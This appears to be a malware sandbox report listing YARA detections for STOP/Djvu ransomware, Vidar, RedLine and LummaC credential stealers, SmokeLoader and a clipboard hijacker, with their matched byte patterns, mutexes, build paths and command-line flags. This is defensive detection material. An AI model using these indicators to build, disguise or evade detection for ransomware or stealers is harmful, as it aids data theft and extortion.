00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001C.00000002.1897883269.000000000482F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x224:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000019.00000002.1943356920.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x736c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000012.00000002.1803333267.0000000000A00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x33e9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x624:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Process Memory Space: 1601.exe PID: 8176	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 8176	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x33366:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 5136	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 5136	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x623b9:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 7472	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 7472	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x38c7b:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 7536	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 7536	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x3148a:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 3944	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 3944	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 3944	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x55887:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 7496	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 7496	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 7496	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x365ba:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: build2.exe PID: 2636	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 7712	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build2.exe PID: 7712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build2.exe PID: 7712	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 455F.exe PID: 3688	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 455F.exe PID: 3688	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 455F.exe PID: 3688	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1601.exe PID: 3108	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 3108	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x38cc3:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 3952	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 3952	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x44fb1:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 5068	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 5068	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x49fc4:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Process Memory Space: 1601.exe PID: 6044	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
Process Memory Space: 1601.exe PID: 6044	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x41f8d:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
Click to see the 82 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
25.2.build3.exe.9215a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
25.2.build3.exe.9215a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
25.2.build3.exe.9215a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
33.2.mstsca.exe.9215a0.1.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
33.2.mstsca.exe.9215a0.1.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
33.2.mstsca.exe.9215a0.1.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
25.2.build3.exe.9215a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
25.2.build3.exe.9215a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.build3.exe.400000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
30.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.build3.exe.400000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
18.2.build2.exe.a015a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.build2.exe.a015a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
33.2.mstsca.exe.9215a0.1.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x603:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
33.2.mstsca.exe.9215a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
30.2.build3.exe.400000.0.raw.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
30.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
30.2.build3.exe.400000.0.raw.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
13.2.1601.exe.48e15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.1601.exe.48e15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.1601.exe.48e15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.1601.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.1601.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.1601.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.1601.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.1601.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.1601.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.1601.exe.49515a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.1601.exe.49515a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
